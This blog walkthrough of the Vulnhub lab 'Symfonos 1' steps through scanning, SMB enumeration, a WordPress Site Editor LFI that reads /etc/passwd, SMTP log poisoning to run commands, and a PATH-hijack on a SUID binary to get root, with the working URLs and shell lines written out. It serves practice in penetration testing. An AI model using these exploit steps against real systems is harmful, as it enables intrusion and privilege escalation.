Vulnhub – Symfonos 1 Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.11 –vv

The host is running smb service that we can scan and list the shares:

So we got a file named attention.txt:

We can now login using helios username and one of these passwords which will be qwerty (after testing each one):

Let’s download these two files research.txt and todo.txt:

The new path /h3l105 is a WordPress site and also change the hosts file to symfonos.local

wpscan –url http://192.168.1.11/h3l105/ -e p:


It says that the upload directory is listing enabled so we check it out and found 3 sub directories:

So i googled it and i found an exploit for it:

And the exploit is LFI command that we use to display the /etc/passwd file:

http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Ok at this point , back when i was doing enumeration the port 25 is poen and had now use till now, we can use SMTP log poison method:

Then we put this line in the address:

view-source:http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id

And we get something like this:

Now to get a shell we put this command:

Let’s use “find” to find SUID files: find / -perm -u=s -type f 2>/dev/null

There is a file /opt/statuscheck where we can abuse using path abuse:

cd /tmp

echo “/bin/sh” > curl

chmod 777 curl

echo path

export PATH=/tmp:/$PATH

/opt/statuscheck

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s